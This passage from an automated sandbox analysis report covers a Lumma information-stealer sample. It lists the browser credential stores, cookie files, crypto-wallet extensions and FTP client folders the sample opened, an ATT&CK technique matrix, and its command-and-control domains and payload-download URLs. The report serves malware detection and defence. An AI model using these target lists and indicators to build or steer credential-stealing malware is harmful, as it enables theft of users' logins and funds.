                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
                    Source: Yara matchFile source: 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.1576307805.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.1576837970.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.1576336868.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: goldlummaa.exe PID: 7460, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: Process Memory Space: goldlummaa.exe PID: 7460, type: MEMORYSTR
                    Source: Yara matchFile source: 3.2.goldlummaa.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.goldlummaa.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    211
                    Process Injection
                    12
                    Virtualization/Sandbox Evasion
                    2
                    OS Credential Dumping
                    1
                    System Time Discovery
                    Remote Services1
                    Screen Capture
                    21
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    PowerShell
                    Boot or Logon Initialization Scripts1
                    DLL Side-Loading
                    211
                    Process Injection
                    LSASS Memory151
                    Security Software Discovery
                    Remote Desktop Protocol1
                    Archive Collected Data
                    11
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Deobfuscate/Decode Files or Information
                    Security Account Manager12
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares41
                    Data from Local System
                    3
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                    Obfuscated Files or Information
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model2
                    Clipboard Data
                    124
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Software Packing
                    LSA Secrets11
                    File and Directory Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials23
                    System Information Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    goldlummaa.exe79%ReversingLabsWin32.Trojan.LummaStealer
                    goldlummaa.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://185.215.113.16/off/def.exeL0%Avira URL Cloudsafe
                    https://tacitglibbr.biz/e100%Avira URL Cloudmalware
                    https://tacitglibbr.biz/h100%Avira URL Cloudmalware
                    http://185.215.113.16/off/def.exe1dO0%Avira URL Cloudsafe
                    http://185.215.113.16/n0%Avira URL Cloudsafe
                    https://tacitglibbr.biz/s100%Avira URL Cloudmalware
                    https://tacitglibbr.biz/al6100%Avira URL Cloudmalware
                    https://tacitglibbr.biz/api.100%Avira URL Cloudmalware
                    https://tacitglibbr.biz/perati100%Avira URL Cloudmalware
                    https://tacitglibbr.biz/int16C100%Avira URL Cloudmalware
                    https://tacitglibbr.biz/rs.100%Avira URL Cloudmalware
                    https://tacitglibbr.biz//100%Avira URL Cloudmalware
                    https://tacitglibbr.biz/.100%Avira URL Cloudmalware
                    https://tacitglibbr.biz/apiX100%Avira URL Cloudmalware
                    https://tacitglibbr.biz/5nascr100%Avira URL Cloudmalware
                    http://185.215.113.16/wU0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    tacitglibbr.biz
                    104.21.50.161
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      sordid-snaked.cyoufalse
                        high
                        deafeninggeh.bizfalse
                          high
                          tacitglibbr.bizfalse
                            high
                            diffuculttan.xyzfalse
                              high
                              effecterectz.xyzfalse
                                high
                                wrathful-jammy.cyoufalse
                                  high
                                  awake-weaves.cyoufalse
                                    high
                                    immureprech.bizfalse
                                      high
                                      https://tacitglibbr.biz/apifalse
                                        high
                                        debonairnukk.xyzfalse
                                          high
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabgoldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://tacitglibbr.biz/goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432304745.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1613022112.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1612892229.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1401845201.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1702688956.0000000000B6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/ac/?q=goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://185.215.113.16/off/def.exeXgoldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://tacitglibbr.biz/pigoldlummaa.exe, 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://185.215.113.16/off/def.exeLgoldlummaa.exe, 00000003.00000002.2085144049.00000000008FA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://tacitglibbr.biz/hgoldlummaa.exe, 00000003.00000003.1576661897.00000000032E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://tacitglibbr.biz/egoldlummaa.exe, 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://x1.c.lencr.org/0goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://x1.i.lencr.org/0goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://185.215.113.16/off/def.exe1dOgoldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchgoldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://tacitglibbr.biz/sgoldlummaa.exe, 00000003.00000002.2085240050.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1702688956.0000000000B6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://185.215.113.16/ngoldlummaa.exe, 00000003.00000002.2085240050.0000000000B55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://support.mozilla.org/products/firefoxgro.allgoldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://tacitglibbr.biz/al6goldlummaa.exe, 00000003.00000003.1613022112.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1612892229.0000000000B6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://tacitglibbr.biz/api.goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icogoldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://tacitglibbr.biz/peratigoldlummaa.exe, 00000003.00000003.1432304745.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1401845201.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://tacitglibbr.biz/int16Cgoldlummaa.exe, 00000003.00000003.1401845201.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                http://185.215.113.16/steam/random.exegoldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://upx.sf.netAmcache.hve.7.drfalse
                                                                        high
                                                                        http://ocsp.rootca1.amazontrust.com0:goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.ecosia.org/newtab/goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brgoldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://tacitglibbr.biz/rs.goldlummaa.exe, 00000003.00000003.1613022112.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1612892229.0000000000B6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://ac.ecosia.org/autocomplete?q=goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://tacitglibbr.biz/.goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                http://185.215.113.16/goldlummaa.exe, 00000003.00000002.2085240050.0000000000B55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://tacitglibbr.biz//goldlummaa.exe, 00000003.00000003.1521242036.00000000032E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://185.215.113.16/Cgoldlummaa.exe, 00000003.00000002.2085240050.0000000000B55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://tacitglibbr.biz/apiXgoldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://185.215.113.16/wUgoldlummaa.exe, 00000003.00000002.2085240050.0000000000B55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://tacitglibbr.biz/5nascrgoldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      http://185.215.113.16/off/def.exegoldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://tacitglibbr.biz:443/apigoldlummaa.exe, 00000003.00000003.1401845201.0000000000B5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            104.21.50.161
                                                                                            tacitglibbr.bizUnited States
                                                                                            13335CLOUDFLARENETUSfalse
                                                                                            185.215.113.16
                                                                                            unknownPortugal
                                                                                            206894WHOLESALECONNECTIONSNLfalse
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1577492
                                                                                            Start date and time:2024-12-18 14:16:41 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 5m 40s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:14
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:goldlummaa.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@6/9@1/2
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
